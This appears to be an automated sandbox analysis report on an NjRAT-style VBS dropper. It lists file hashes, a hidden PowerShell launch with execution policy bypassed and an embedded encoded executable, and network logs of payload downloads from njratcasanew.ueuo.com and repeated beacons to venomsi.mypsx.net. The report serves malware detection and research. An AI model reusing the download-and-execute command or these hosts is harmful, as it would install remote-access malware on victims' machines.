Preview:	.**********************..Windows PowerShell transcript start..Start time: 20220221064929..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 347688 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $LHgK = 'TVqQ......M............E............//8......Lg...........................Q...........................................................................................................................................

Static File Info

General

File type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Entropy (8bit):	3.472337682596374
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	NJratccccassssG2.00.vbs
File size:	115366
MD5:	4833452ece935ea45c3b0912db2fc0bd
SHA1:	111ba6889be1031376e62b1e87dd83041ace2352
SHA256:	965b43f6e33c4b12172f54bd6361f892a3c7f8aa6d75ac3a8665b090ff9d819f
SHA512:	ccfbcf3730dc1e7204d8d92fc573e56b4f1ee7a7453ba07771701a84151085a8e2dc332477805631a735229a9d36aad9c5fe28fe14d91fcaf208f7f669241d9e
SSDEEP:	384:5iMCCfz7IvJQ3FQ1/LMVeUOaPNoRq09dbelfkzgFSoaGBUgU01P:5ndXQ6Veh8kdbelfk0H7UgUE
File Content Preview:	..:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/21/22-06:49:48.193334	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	59026	8.8.8.8	192.168.2.3
02/21/22-06:50:11.504518	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	58361	8.8.8.8	192.168.2.3
02/21/22-06:50:57.849870	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	57106	8.8.8.8	192.168.2.3
02/21/22-06:51:20.992264	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60352	8.8.8.8	192.168.2.3
02/21/22-06:51:44.085582	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56773	8.8.8.8	192.168.2.3
02/21/22-06:52:07.196195	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60982	8.8.8.8	192.168.2.3
02/21/22-06:52:30.311854	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	58058	8.8.8.8	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 21, 2022 06:49:31.257205009 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.362876892 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.362984896 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.363883018 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.469897985 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.469949961 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.469990015 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.470000029 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.470037937 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.470093012 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.470119953 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.470133066 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.470171928 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.470175028 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.470211029 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.470249891 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.470261097 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.470290899 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.470339060 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.576039076 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576092958 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576144934 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576181889 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576224089 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576261997 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576301098 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576348066 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576379061 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.576386929 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576401949 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.576405048 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.576406956 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.576426029 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576467037 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576473951 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.576505899 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576545954 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576550961 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.576585054 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576622963 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576632977 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.576662064 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576702118 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576706886 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.576741934 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576782942 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576786995 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.576821089 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.576865911 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682331085 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682373047 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682404995 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682430029 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682435036 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682470083 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682470083 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682498932 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682531118 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682533979 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682555914 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682594061 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682594061 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682626963 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682656050 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682665110 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682686090 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682712078 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682720900 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682729959 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682746887 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682763100 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682765007 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682779074 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682795048 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682800055 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682811022 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682826996 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682832956 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682843924 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682859898 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682867050 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682878017 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682893991 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682893038 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682912111 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682928085 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682930946 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682945013 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682960033 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682964087 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.682976961 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682993889 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.682998896 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.683011055 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.683028936 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.683034897 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.683046103 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.683062077 CET	80	49755	198.50.177.251	192.168.2.3
Feb 21, 2022 06:49:31.683068991 CET	49755	80	192.168.2.3	198.50.177.251
Feb 21, 2022 06:49:31.683079004 CET	80	49755	198.50.177.251	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 21, 2022 06:49:31.943273067 CET	56009	53	192.168.2.3	8.8.8.8
Feb 21, 2022 06:49:31.962196112 CET	53	56009	8.8.8.8	192.168.2.3
Feb 21, 2022 06:49:48.172838926 CET	59026	53	192.168.2.3	8.8.8.8
Feb 21, 2022 06:49:48.193334103 CET	53	59026	8.8.8.8	192.168.2.3
Feb 21, 2022 06:50:11.483433008 CET	58361	53	192.168.2.3	8.8.8.8
Feb 21, 2022 06:50:11.504518032 CET	53	58361	8.8.8.8	192.168.2.3
Feb 21, 2022 06:50:34.719202042 CET	50728	53	192.168.2.3	8.8.8.8
Feb 21, 2022 06:50:34.738262892 CET	53	50728	8.8.8.8	192.168.2.3
Feb 21, 2022 06:50:57.831177950 CET	57106	53	192.168.2.3	8.8.8.8
Feb 21, 2022 06:50:57.849869967 CET	53	57106	8.8.8.8	192.168.2.3
Feb 21, 2022 06:51:20.971386909 CET	60352	53	192.168.2.3	8.8.8.8
Feb 21, 2022 06:51:20.992264032 CET	53	60352	8.8.8.8	192.168.2.3
Feb 21, 2022 06:51:44.066652060 CET	56773	53	192.168.2.3	8.8.8.8
Feb 21, 2022 06:51:44.085582018 CET	53	56773	8.8.8.8	192.168.2.3
Feb 21, 2022 06:52:07.177412033 CET	60982	53	192.168.2.3	8.8.8.8
Feb 21, 2022 06:52:07.196194887 CET	53	60982	8.8.8.8	192.168.2.3
Feb 21, 2022 06:52:30.290947914 CET	58058	53	192.168.2.3	8.8.8.8
Feb 21, 2022 06:52:30.311853886 CET	53	58058	8.8.8.8	192.168.2.3
Feb 21, 2022 06:52:53.506216049 CET	64367	53	192.168.2.3	8.8.8.8
Feb 21, 2022 06:52:53.525224924 CET	53	64367	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 21, 2022 06:49:31.943273067 CET	192.168.2.3	8.8.8.8	0x252	Standard query (0)	njratcasanew.ueuo.com	A (IP address)	IN (0x0001)
Feb 21, 2022 06:49:48.172838926 CET	192.168.2.3	8.8.8.8	0xca47	Standard query (0)	venomsi.mypsx.net	A (IP address)	IN (0x0001)
Feb 21, 2022 06:50:11.483433008 CET	192.168.2.3	8.8.8.8	0x6804	Standard query (0)	venomsi.mypsx.net	A (IP address)	IN (0x0001)
Feb 21, 2022 06:50:34.719202042 CET	192.168.2.3	8.8.8.8	0x182d	Standard query (0)	venomsi.mypsx.net	A (IP address)	IN (0x0001)
Feb 21, 2022 06:50:57.831177950 CET	192.168.2.3	8.8.8.8	0x972c	Standard query (0)	venomsi.mypsx.net	A (IP address)	IN (0x0001)
Feb 21, 2022 06:51:20.971386909 CET	192.168.2.3	8.8.8.8	0x750b	Standard query (0)	venomsi.mypsx.net	A (IP address)	IN (0x0001)
Feb 21, 2022 06:51:44.066652060 CET	192.168.2.3	8.8.8.8	0x4fdb	Standard query (0)	venomsi.mypsx.net	A (IP address)	IN (0x0001)
Feb 21, 2022 06:52:07.177412033 CET	192.168.2.3	8.8.8.8	0xc900	Standard query (0)	venomsi.mypsx.net	A (IP address)	IN (0x0001)
Feb 21, 2022 06:52:30.290947914 CET	192.168.2.3	8.8.8.8	0xec81	Standard query (0)	venomsi.mypsx.net	A (IP address)	IN (0x0001)
Feb 21, 2022 06:52:53.506216049 CET	192.168.2.3	8.8.8.8	0x12f7	Standard query (0)	venomsi.mypsx.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 21, 2022 06:49:31.962196112 CET	8.8.8.8	192.168.2.3	0x252	No error (0)	njratcasanew.ueuo.com	162.253.155.226	A (IP address)	IN (0x0001)
Feb 21, 2022 06:49:48.193334103 CET	8.8.8.8	192.168.2.3	0xca47	No error (0)	venomsi.mypsx.net	201.121.59.253	A (IP address)	IN (0x0001)
Feb 21, 2022 06:50:11.504518032 CET	8.8.8.8	192.168.2.3	0x6804	No error (0)	venomsi.mypsx.net	201.121.59.253	A (IP address)	IN (0x0001)
Feb 21, 2022 06:50:34.738262892 CET	8.8.8.8	192.168.2.3	0x182d	No error (0)	venomsi.mypsx.net	201.121.59.253	A (IP address)	IN (0x0001)
Feb 21, 2022 06:50:57.849869967 CET	8.8.8.8	192.168.2.3	0x972c	No error (0)	venomsi.mypsx.net	201.121.59.253	A (IP address)	IN (0x0001)
Feb 21, 2022 06:51:20.992264032 CET	8.8.8.8	192.168.2.3	0x750b	No error (0)	venomsi.mypsx.net	201.121.59.253	A (IP address)	IN (0x0001)
Feb 21, 2022 06:51:44.085582018 CET	8.8.8.8	192.168.2.3	0x4fdb	No error (0)	venomsi.mypsx.net	201.121.59.253	A (IP address)	IN (0x0001)
Feb 21, 2022 06:52:07.196194887 CET	8.8.8.8	192.168.2.3	0xc900	No error (0)	venomsi.mypsx.net	201.121.59.253	A (IP address)	IN (0x0001)
Feb 21, 2022 06:52:30.311853886 CET	8.8.8.8	192.168.2.3	0xec81	No error (0)	venomsi.mypsx.net	201.121.59.253	A (IP address)	IN (0x0001)
Feb 21, 2022 06:52:53.525224924 CET	8.8.8.8	192.168.2.3	0x12f7	No error (0)	venomsi.mypsx.net	201.121.59.253	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

198.50.177.251

njratcasanew.ueuo.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49755	198.50.177.251	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Feb 21, 2022 06:49:31.363883018 CET	1140	OUT	GET /rump/4.txt HTTP/1.1 Host: 198.50.177.251 Connection: Keep-Alive
Feb 21, 2022 06:49:31.469897985 CET	1142	IN	HTTP/1.1 200 OK Date: Mon, 21 Feb 2022 05:49:27 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.2 Last-Modified: Sun, 13 Feb 2022 22:15:32 GMT ETag: "20672-5d7eda36b6806" Accept-Ranges: bytes Content-Length: 132722 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 e2 99 88 e2 98 91 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49756	162.253.155.226	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Feb 21, 2022 06:49:32.139425993 CET	1282	OUT	GET /NJratNEW%20casa/base%2064%20NJratNEWcasa.txt HTTP/1.1 Host: njratcasanew.ueuo.com Connection: Keep-Alive
Feb 21, 2022 06:49:32.315517902 CET	1283	IN	HTTP/1.1 200 OK Date: Mon, 21 Feb 2022 05:49:32 GMT Server: Apache/2.4.41 Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Tue, 08 Feb 2022 10:22:57 GMT ETag: "aaac-5d77f19cbf4d2" Accept-Ranges: bytes Content-Length: 43692 Keep-Alive: timeout=1, max=10000 Content-Type: text/plain Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Target ID:	0
Start time:	06:49:04
Start date:	21/02/2022
